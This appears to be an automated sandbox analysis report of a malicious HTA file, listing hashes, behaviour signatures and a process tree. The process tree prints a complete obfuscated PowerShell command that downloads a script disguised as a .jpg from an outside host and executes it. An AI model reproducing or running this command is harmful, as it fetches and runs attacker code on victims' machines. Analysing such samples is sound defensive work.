Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    28-10-2022 11:49

General

  • Target

    GORILLA_Last.hta

  • Size

    46KB

  • MD5

    750984a5dbe06c1092efbfdcaa2c0e45

  • SHA1

    7a77048b108835f4ecc15cad2ae2fc3bce2d8b10

  • SHA256

    dabdd1dc8f9dd5c796a50f9b09c2831073b318a0421a49af0caa153109e0488a

  • SHA512

    fc6ee1773eaae435e8f6bc639f7c85dfc72bfd694a84a8d78862863a12317f81d9d19c46b87efa85f86f67bf4541fce07b191b2730ee6a7227762c8bd0803825

  • SSDEEP

    768:otwjF6wFIk//xGWU/NaqjN+yUv4CZgS01ZNuIDyHmPHaPbgtlNJzLa2p9bn+ImY9:WwYwFDYWsjg/48euBtP83NQsSpr47pP/

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\GORILLA_Last.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $kaoskdoaksd = [System.NET.WebRequest]::Create('https://corpolevesuplementos.com.br/2022pws/assyncpws.jpg');$ajdiasjdijasd = $kaoskdoaksd.GetResponse();$KASDJASDU = ([System.IO.StreamReader]($ajdiasjdijasd.GetResponseStream())).ReadToEnd()| .('{1}{0}'-f'EX','I')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1780

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/456-54-0x0000000074F01000-0x0000000074F03000-memory.dmp

    Filesize

    8KB

  • memory/1780-57-0x0000000070DF0000-0x000000007139B000-memory.dmp

    Filesize

    5.7MB

  • memory/1780-58-0x0000000070DF0000-0x000000007139B000-memory.dmp

    Filesize

    5.7MB